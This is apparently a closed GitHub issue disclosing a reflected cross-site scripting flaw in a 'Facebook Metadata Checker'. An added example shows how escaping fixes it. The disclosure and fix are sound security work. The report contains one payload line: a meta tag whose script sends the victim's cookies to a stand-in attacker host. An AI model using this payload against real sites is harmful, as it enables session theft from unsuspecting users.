Possible Reflected Cross Site Scripting Detected
Closed this issue · 0 comments
guimaraesr-y commented
Reflected Cross Site Scripting Possibly Found
Looks like there is a Reflected XSS vulnerability in the section "Facebook Metadata Checker".
There's no sanitizing of the metadata content that comes from the checked website. This makes it possible for an attacker to write malicious code and, with some social engineering, contact a user. When the user opens the given URL, his cookies and credentials get stolen by the hacker.
The meta script that I used:
<meta property="og:description" content="Here the script will get the cookies and send to the attacker's server using XMLHttpRequest. <script>const xhttp=new XMLHttpRequest(); xhttp.open('GET', 'https://evilsite.example.com/steal?cookies='+document.cookie); xhttp.send()</script>">
Impact
An attacker could use social engineering to send a link to a user and then execute JavaScript in his page. By executing JavaScript on the user's page, the attacker can steal cookies and information and modify the HTML.
P.S.: By modifying the HTML, the attacker can ask the user for personal and sensitive data and steal it.
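The fix for the issue reported above is to treat every value read from the checked site as untrusted text and encode it before it reaches the results page. The following is an added example, not code from the project or from the reporter: the function names and the sample page are hypothetical, and the sample uses a harmless script body.

```javascript
// Constructed sample: HTML returned by a site submitted to the checker.
const SAMPLE_PAGE = `<html><head>
<meta property="og:title" content="Demo page">
<meta property="og:description" content="Hello <script>document.title='injected'</script>">
</head></html>`;

// Hypothetical helper: collect og:* properties from the fetched HTML.
function extractOgTags(html) {
  const tags = {};
  const re = /<meta\s+property="(og:[^"]+)"\s+content="([^"]*)"\s*\/?>/gi;
  for (const m of html.matchAll(re)) tags[m[1]] = m[2];
  return tags;
}

// Encode the five characters that are significant in HTML text and attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Before: remote values are concatenated into the results markup as-is,
// so a <script> inside og:description becomes part of the page.
function renderUnsafe(tags) {
  return Object.entries(tags)
    .map(([name, value]) => `<tr><td>${name}</td><td>${value}</td></tr>`)
    .join("\n");
}

// After: both the property name and its value are encoded on output,
// so the same input is displayed as inert text.
function renderSafe(tags) {
  return Object.entries(tags)
    .map(([name, value]) => `<tr><td>${escapeHtml(name)}</td><td>${escapeHtml(value)}</td></tr>`)
    .join("\n");
}

const tags = extractOgTags(SAMPLE_PAGE);
console.log("unsafe:\n" + renderUnsafe(tags));
console.log("safe:\n" + renderSafe(tags));
```

When the results are built in the browser instead, assigning the value through `textContent` gives the same effect without manual escaping.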